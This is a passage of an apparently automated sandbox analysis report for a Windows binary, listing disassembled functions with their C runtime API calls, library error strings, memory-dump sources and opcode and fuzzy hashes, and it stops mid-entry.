                              • Instruction ID: b0acf4805c8ad9157ada41203f76a7faa2909b878c1e4afbb455ccf07990c801
                              • Opcode Fuzzy Hash: 5a26191a9a50b075db456e764b83f220906e009dc922310ed1598a2b9afdc25f
                              • Instruction Fuzzy Hash: 2721F422B0964590EDB1AF1A92446BCD7505B49BD0F888931CF9C6F391EF2DE445A323
                              Function 00007FF733AA9940 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$AffinityCurrentMask
                              • String ID:
                              • API String ID: 1231390398-0
                              • Opcode ID: 9ab2ce007a831d89d0240a535ee6894378552e7a7050ba6a2dee1ae257e91120
                              • Instruction ID: 475f5680b76bdfa0d2c9ed9fff4313ba41a46103dcf6f981c10cfa377dcab806
                              • Opcode Fuzzy Hash: 9ab2ce007a831d89d0240a535ee6894378552e7a7050ba6a2dee1ae257e91120
                              • Instruction Fuzzy Hash: B501D833B0C61966EBB06F65A8407A9D390EF44B45F88403CEE8C67760DD2DD8069261
                              Function 00007FF733B0E7A0 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON
                              Download Yara Rule
                              APIs
                              • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF733B43E26), ref: 00007FF733B0E7AB
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF733B43E26), ref: 00007FF733B0E7B6
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF733B43E26), ref: 00007FF733B0E7DF
                              • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF733B43E26), ref: 00007FF733B0E7ED
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: setlocale$memcpystrlen
                              • String ID:
                              • API String ID: 4096897932-0
                              • Opcode ID: 2c9d0c3d538110c1a1de299165519f211a905f8b8edfa510afd2ff76b7e421cf
                              • Instruction ID: 90eb8186b7f4c3d46c3debe219e10bf2ef5c93b65f2fb17e208b21086592d239
                              • Opcode Fuzzy Hash: 2c9d0c3d538110c1a1de299165519f211a905f8b8edfa510afd2ff76b7e421cf
                              • Instruction Fuzzy Hash: C1F0A052F0965620FEF8B72359526FA82525F49BC0FC88135EC1E3B3A6DE2CE4426721
                              Function 00007FF733AA8BB0 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                              Download Yara Rule
                              APIs
                              • TlsAlloc.KERNEL32 ref: 00007FF733AA8BB4
                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733B4B830
                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00007FF733AAA089,?,?,?,?,00007FF733AAC27F), ref: 00007FF733B4B836
                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00007FF733AAA089,?,?,?,?,00007FF733AAC27F), ref: 00007FF733B4B83C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: abort$Alloc
                              • String ID:
                              • API String ID: 2768898901-0
                              • Opcode ID: 61d208f3bd999b4500d761accacd8a0f1da8f89e8d28634947029be1c6ec5342
                              • Instruction ID: ec10a082cc944c758581e851c54d7146ee88ce9be717f185ed3abece7d81135b
                              • Opcode Fuzzy Hash: 61d208f3bd999b4500d761accacd8a0f1da8f89e8d28634947029be1c6ec5342
                              • Instruction Fuzzy Hash: ECF03022D1AA06E6F6A0BF28E881779A3A0FF55354F802731E1ED733B1DF2CD0449A14
                              Function 00007FF733B16D90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: basic_filebuf::xsgetn error reading the file
                              • API String ID: 0-3108371566
                              • Opcode ID: 61969805a97bd2853f6f82323e9d66ac93b14af5703a6ea8e4081a2aec52f17a
                              • Instruction ID: 1b255b9a53facc788e859b99a17f3c6fa910c1ef9c09b90529037fbe38e45a05
                              • Opcode Fuzzy Hash: 61969805a97bd2853f6f82323e9d66ac93b14af5703a6ea8e4081a2aec52f17a
                              • Instruction Fuzzy Hash: 1E510513E09A8596EAB09B35D4003AAA361FB55B88F988331DFDD56791EF3CF085D311
                              Function 00007FF733B2D190 Relevance: 5.3, APIs: 4, Instructions: 329stringCOMMON
                              Download Yara Rule
                              APIs
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACDC78), ref: 00007FF733B2D1F8
                                • Part of subcall function 00007FF733AB3510: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7,?,00007FF733B4E970,00000000,00007FF733B3069A,00000002), ref: 00007FF733AB3545
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACDC78), ref: 00007FF733B2D27F
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACDC78), ref: 00007FF733B2D301
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACDC78), ref: 00007FF733B2D383
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen$memcpy
                              • String ID:
                              • API String ID: 3396830738-0
                              • Opcode ID: f976e0b4bbaa50581eaf68234e2e723e2051ff373beb0eb9c0880b565059f2a3
                              • Instruction ID: 2b4503289e813a5dd02121158aafcbb7dafe89651ba567b7569c7a367c4002e0
                              • Opcode Fuzzy Hash: f976e0b4bbaa50581eaf68234e2e723e2051ff373beb0eb9c0880b565059f2a3
                              • Instruction Fuzzy Hash: 26E1D472608B4695DAB0EF19E44056DB360FB85BD4F900236EEAD977A5DF3CE140E321
                              Function 00007FF733B2C9C0 Relevance: 5.3, APIs: 4, Instructions: 329stringCOMMON
                              Download Yara Rule
                              APIs
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACCA58), ref: 00007FF733B2CA28
                                • Part of subcall function 00007FF733AB3510: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7,?,00007FF733B4E970,00000000,00007FF733B3069A,00000002), ref: 00007FF733AB3545
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACCA58), ref: 00007FF733B2CAAF
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACCA58), ref: 00007FF733B2CB31
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACCA58), ref: 00007FF733B2CBB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen$memcpy
                              • String ID:
                              • API String ID: 3396830738-0
                              • Opcode ID: beb4772063d29fe77e85baf62e8de884c4b452200c5a8bc14d0f42c971acc123
                              • Instruction ID: 099489aa496358addd8d1e838d88b7882625d028689e671478c15c0ea3ee5c19
                              • Opcode Fuzzy Hash: beb4772063d29fe77e85baf62e8de884c4b452200c5a8bc14d0f42c971acc123
                              • Instruction Fuzzy Hash: BEE1C272608B4AA1DAB0EB1AE44056DB761FB85BD0B900232EE9D577A4DF3DE440E361
                              Function 00007FF733B2D960 Relevance: 5.3, APIs: 4, Instructions: 324stringCOMMON
                              Download Yara Rule
                              APIs
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACF348), ref: 00007FF733B2D9C8
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACF348), ref: 00007FF733B2DA63
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACF348), ref: 00007FF733B2DAFA
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733ACF348), ref: 00007FF733B2DB90
                                • Part of subcall function 00007FF733AB3510: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7,?,00007FF733B4E970,00000000,00007FF733B3069A,00000002), ref: 00007FF733AB3545
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcslen$memcpystrlen
                              • String ID:
                              • API String ID: 3111578849-0
                              • Opcode ID: dd59b04d71c69fe83a08ee5fa7b7c4e984b71f1ea8b185cfc875c4b026b0ce0f
                              • Instruction ID: 5adc89c724cddd7a4760b3c0c02fc78faac1292f82e0d1b896c3d119b7805f63
                              • Opcode Fuzzy Hash: dd59b04d71c69fe83a08ee5fa7b7c4e984b71f1ea8b185cfc875c4b026b0ce0f
                              • Instruction Fuzzy Hash: 3CE1A462608B4AA1EEB0EB19E44067DA361FB85BE0F900636EEAD977D5DF3CD440D311
                              Function 00007FF733B2E120 Relevance: 5.3, APIs: 4, Instructions: 324stringCOMMON
                              Download Yara Rule
                              APIs
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733AD0568), ref: 00007FF733B2E188
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733AD0568), ref: 00007FF733B2E223
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733AD0568), ref: 00007FF733B2E2BA
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,?,?,?,?,?,?,00007FF733AD0568), ref: 00007FF733B2E350
                                • Part of subcall function 00007FF733AB3510: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7,?,00007FF733B4E970,00000000,00007FF733B3069A,00000002), ref: 00007FF733AB3545
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcslen$memcpystrlen
                              • String ID:
                              • API String ID: 3111578849-0
                              • Opcode ID: 9b39fbd1f26dd276225bb686ab59653e8015c8f09217ee83b8cb00fb31ef1d4f
                              • Instruction ID: 111d43866cb117c40501d4627ab962f0cc0558a9b7e29b355f8656b30ed2757c
                              • Opcode Fuzzy Hash: 9b39fbd1f26dd276225bb686ab59653e8015c8f09217ee83b8cb00fb31ef1d4f
                              • Instruction Fuzzy Hash: D2E1A662608B4595DAB0EB2AE44067DA361FB89BD0F900732EEAD977E5DF3CD440D321
                              Function 00007FF733AA8CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func
                              • String ID: %p not found?!?!
                              • API String ID: 711238415-11085004
                              • Opcode ID: ed13867beff09c728a9612e401888e75a7f8c261a6d9d017e74d23abf9b1ce4f
                              • Instruction ID: 664ee6b790d15f898db48da68371b406a46f3999397ff9b301d68618b68ebc4d
                              • Opcode Fuzzy Hash: ed13867beff09c728a9612e401888e75a7f8c261a6d9d017e74d23abf9b1ce4f
                              • Instruction Fuzzy Hash: E5118723F09606A1FDF57B559500978D6589F58BC1FC80535ED6D367D0DE2CE881A3B0
                              Function 00007FF733A9CA30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func
                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 711238415-3474627141
                              • Opcode ID: 068fa9cf20d6c7cb18d89e6c32f311f541b0244a49ec6e235a2481b971a6b72c
                              • Instruction ID: 7c045d8f6cf34c9df55c4b9c642eb50aeae71a9a2a7f567dc22f57b198323a7b
                              • Opcode Fuzzy Hash: 068fa9cf20d6c7cb18d89e6c32f311f541b0244a49ec6e235a2481b971a6b72c
                              • Instruction Fuzzy Hash: 97018662908E8491E6569F1DD8015FAB374FF5A756F545322EB8C36220DF29D543D700
                              Function 00007FF733AB1E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strerrorstrlen
                              • String ID: basic_string: construction from null is not valid
                              • API String ID: 960536887-2991274800
                              • Opcode ID: aebc431caa5ef0d12ad0f232ac6932e3b4a054bf403e9227d361f4b21222cf5f
                              • Instruction ID: 833a99e0b7351904a982c6593e2b76fdd7eaffb3235cd50690382e3d5242ae6b
                              • Opcode Fuzzy Hash: aebc431caa5ef0d12ad0f232ac6932e3b4a054bf403e9227d361f4b21222cf5f
                              • Instruction Fuzzy Hash: C7E02202F5952460EAA87B22A8010F9A2208F45F80FC80432ED4D3B792DD2CE8839361
                              Function 00007FF733A9CAD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-2713391170
                              • Opcode ID: 1e4c39d67ea9d033cb5006da6215ff34ce5f98617b917b22a998575e41b23ba8
                              • Instruction ID: eaaf67b0c2401aa267fa96001b092744160625ede32a35b40a9b466eede83a54
                              • Opcode Fuzzy Hash: 1e4c39d67ea9d033cb5006da6215ff34ce5f98617b917b22a998575e41b23ba8
                              • Instruction Fuzzy Hash: FAF06253808E8881D2529F1CA8001BBB375FF9E789F645326EB8D36564DF29DA839750
                              Function 00007FF733A9CB10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-4273532761
                              • Opcode ID: 2b6205a57540f7161f85910137426f6bf07c236fb42dce4656dbae0ffc8f1d92
                              • Instruction ID: 33d91eb7978556055cf847f287b794f244021b709c40b5e5aed6a799f5ed8034
                              • Opcode Fuzzy Hash: 2b6205a57540f7161f85910137426f6bf07c236fb42dce4656dbae0ffc8f1d92
                              • Instruction Fuzzy Hash: 5CF06253808E8481D251AF1CA8001BBB374FF9E789F655326EB8D36564DF28DA839750
                              Function 00007FF733A9CB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
